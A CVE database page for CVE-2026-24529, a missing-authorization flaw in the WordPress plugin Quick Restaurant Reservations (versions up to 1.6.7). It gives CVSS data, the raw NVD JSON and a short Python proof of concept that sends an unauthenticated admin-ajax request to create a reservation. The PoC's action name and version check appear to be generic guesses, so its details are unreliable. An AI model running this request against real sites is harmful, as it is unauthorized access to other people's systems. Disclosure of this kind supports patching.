Security Vulnerability Report
中文
CVE-2026-24529 CVSS 5.3 MEDIUM

CVE-2026-24529

Published: 2026-01-23 15:16:09
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Alejandro Quick Restaurant Reservations quick-restaurant-reservations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Restaurant Reservations: from n/a through <= 1.6.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quick Restaurant Reservations <= 1.6.7 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-24529 PoC - Missing Authorization in Quick Restaurant Reservations # Target: WordPress site with Quick Restaurant Reservations plugin <= 1.6.7 TARGET_URL = "http://target-wordpress-site.com" def exploit_missing_authorization(): """ This PoC demonstrates the missing authorization vulnerability. The plugin fails to properly verify user permissions before executing privileged operations. """ # Example 1: Unauthorized access to reservation management endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Create a reservation without authentication (原本需要管理员权限) payload = { 'action': 'quick_restaurant_reservations_save', 'reservation_data': { 'customer_name': 'Attacker Test', 'customer_email': '[email protected]', 'reservation_date': '2026-02-01', 'reservation_time': '19:00', 'party_size': '4', 'notes': 'Unauthorized reservation via PoC' } } # Send request without authentication cookie response = requests.post(endpoint, data=payload) if response.status_code == 200: print("[+] Successfully created reservation without authorization!") print(f"[+] Response: {response.text}") else: print("[-] Request failed or properly blocked") def check_vulnerability(): """ Check if target is vulnerable by attempting unauthorized access. """ # Check plugin version if accessible readme_url = f"{TARGET_URL}/wp-content/plugins/quick-restaurant-reservations/readme.txt" response = requests.get(readme_url) if '1.6.7' in response.text or '1.6' in response.text: print("[!] Target appears to be running vulnerable version") return True return False if __name__ == "__main__": print("CVE-2026-24529 - Quick Restaurant Reservations Authorization Bypass") check_vulnerability() exploit_missing_authorization()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24529", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:08.797", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Alejandro Quick Restaurant Reservations quick-restaurant-reservations allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quick Restaurant Reservations: from n/a through <= 1.6.7."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en Alejandro Quick Restaurant Reservations quick-restaurant-reservations permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Quick Restaurant Reservations: desde n/a hasta &lt;= 1.6.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/quick-restaurant-reservations/vulnerability/wordpress-quick-restaurant-reservations-plugin-1-6-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}